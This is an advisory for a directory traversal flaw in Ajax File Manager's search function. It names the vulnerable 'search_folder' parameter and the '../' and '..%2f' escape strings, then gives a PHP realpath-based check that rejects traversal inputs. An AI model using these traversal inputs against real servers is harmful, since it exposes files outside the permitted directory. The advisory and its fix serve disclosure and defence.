Vendor: Ajax File Manager
By: Eduardo Alves (edudx9)
CVSS: 4,3 (MEDIUM)
CWE: 22 (Directory Traversal)
Product Name: Ajax File Manager
Affected Version From: All
Affected Version To: All
Patch Exists: YES
Related CWE: N/A
CPE: a:phpletter:ajax_file_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows/Linux
2014
Exploit Title: Ajax File Manager DirectoryTraversal
Ajax File/Image Manager is a tool to manage files and images remotely. Without extra configuration, it is possible to list files from another directory. The vulnerability is related to the 'search' function: in the 'search_folder' parameter, the base directory can be escaped with ../ or ..%2f
Mitigation:
Ensure that user-supplied input is validated and filtered before being used in a filesystem operation.
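
One way to apply this mitigation in PHP, the language Ajax File Manager is written in (an added example, not code from the project or from this advisory): canonicalise the requested folder with realpath() and accept it only if the result stays under the configured base directory. The function name resolveSearchFolder and the temporary directory layout are assumptions made for the demo.

```php
<?php
// Added example: containment check for a user-supplied folder name.
// resolveSearchFolder() and the directory layout below are hypothetical.

function resolveSearchFolder(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null; // misconfigured base directory or embedded NUL byte
    }
    // Treat "\" like "/" so both separator styles take the same path.
    $requested = str_replace('\\', '/', $requested);
    // realpath() collapses "." and ".." and follows symlinks; it returns
    // false when the resulting path does not exist.
    $target = realpath($base . '/' . ltrim($requested, '/'));
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // Compare against "base + separator" so a sibling such as
    // "/srv/uploaded_old" is not mistaken for a child of "/srv/uploaded".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed directory layout for the demo.
$root = sys_get_temp_dir() . '/afm_demo_' . getmypid();
mkdir("$root/uploaded/images", 0700, true);
mkdir("$root/private", 0700, true);
$base = "$root/uploaded";

// Constructed sample values for the search_folder parameter. The last one
// is the decoded form of "..%2f", which is what a script receives after
// PHP has URL-decoded the query string.
$samples = ['images', '', '../private', 'images/../../private',
            '..%2fprivate', rawurldecode('..%2fprivate')];
foreach ($samples as $s) {
    $result = resolveSearchFolder($base, $s);
    printf("%-26s => %s\n", var_export($s, true),
           $result === null ? 'REJECTED' : 'allowed');
}

// Remove the demo directories.
rmdir("$root/uploaded/images"); rmdir("$root/uploaded");
rmdir("$root/private"); rmdir($root);
```

Only 'images' and the empty string (the base directory itself) are allowed; every variant that resolves outside the base, or that does not exist, is rejected before any directory listing takes place.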